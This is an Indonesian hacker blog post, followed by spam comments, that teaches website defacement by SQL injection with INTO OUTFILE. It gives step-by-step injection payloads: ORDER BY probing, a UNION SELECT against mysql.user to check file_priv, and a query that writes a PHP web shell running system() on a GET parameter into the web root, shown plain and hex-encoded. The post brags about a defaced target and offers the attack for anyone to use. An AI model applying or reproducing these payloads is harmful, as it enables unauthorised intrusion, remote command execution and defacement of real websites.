Cara Deface SQL-Injection Into Outfile

yo whatsap gaes, btw Assalamu'alaikum.. :)
kenalin nama gw Umam paling ganteng di Ghost Riddiculous Team. Kali ini gw mo berbagi ilmu, cara deface SQL-Injection Into Outfile - Upload shell without admin panel.
langsung aja ga usah basa basi h3h3

1. Internet lah pastinya
2. Target gan, klo ga ada target mo ngapain? :v
3. Kopi + Asap 😎

life target :

step satu byasalah ya cari error nya dulu dengan quote ' klo error brrti ya vuln. Lakukan order by 1000 --+- sprti gambar dibawah

disitu muncul error kek gini..
Warning: mysqli_fetch_array() expects parameter 1 to be mysqli_result, boolean given in D:\xampp\htdocs\bernadyland\berita\lihatDetailBerita.php on line 4

nah, step kedua lakukan union select pada umumna lah.. klo uda nampilin angka togelna sprti gambar dibawah ini..

kyta lgs cek file_privnya saja gan, contoh; union select 1,2,file_priv,3,4 from mysql.user-- -

klo muncul huruf Y kek gambar dibawah, brrti writable / bisa di into outfile. Klo engga? yaa gimana ya, bukan siapa" sih. Yaudah sih.. ;)

disini gw milih angka 4, knapa? karna aku sayang kamu h3h3 :)
nahkan muncul huruf Y, ini saaatnya kyta into outfile. Gimana mas caranya? gini slur, contoh; union select 1,2,<?php if(isset($_GET['grt'])){ echo system($_GET['grt']); }? >,4,5 into outfile '/home/user/public_html/tes.php'-- -

kode phpnya di hexa dulu slur, mo pake kode itu apa uploader lgs terserah, yg penting di hexa, gini jadina. union select 1,2,0x3c3f70687020696628697373657428245f4745545b27677274275d29297b206563686f2073797374656d28245f4745545b27677274275d293b207d3f203e,3,4 into outfile 'D:/xampp/htdocs/bernadyland/berita/test.php'-- -

ini environ yg di dapatkan dari gambar error diatas.

klo udah tinggal akses shell cmdna
disini kyta mainan rce, klo ga bisa di rce ya uploader lgs aja kode yg hexa tadi.

cara rce na gini -O shell.php

tinggal akses lagi

web yg di ss tadi:v
mirror :

oke mau lu apain bebas :)
btw nitip nick Umam 1337

Thanks for all member Ghost Riddiculous Team
Mohon maap jika ada kekurangan kata.

8 Responses to "Cara Deface SQL-Injection Into Outfile"

  1. Messy fuel injectors can't convey the right splash design that is fundamental for spotless, effective burning. best fuel system cleaner

  2. I can set up my new idea from this post. It gives in depth information. Thanks for this valuable information for all,.. two shot injection moulding

  3. I really like your blog. Great article. It's most evident, people should learn before they are able to

  4. I am really enjoying reading your well written articles. It looks like you spend a lot of effort and time on your blog. I have bookmarked it and I am looking forward to reading new articles. Keep up the good work. lifestyle sports

  5. The next time I read a blog, I hope that it doesnt disappoint me as much as this one. I mean, I know it was my choice to read, but I actually thought you have something interesting to say. All I hear is a bunch of whining about something that you could fix if you werent too busy looking for attention. Albert Einstein

  6. Really appreciate this wonderful post that you have provided for us.Great site and a great topic as well i really get amazed to read this. Its really good. Albert Einstein

  7. ᐈ Casino Site to Start Betting at 2021 - LuckyClub
    LuckyClub, a leading betting exchange, luckyclub is one of the most popular and most trusted online bookmakers. Bet on all your favourite sports and games from


Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel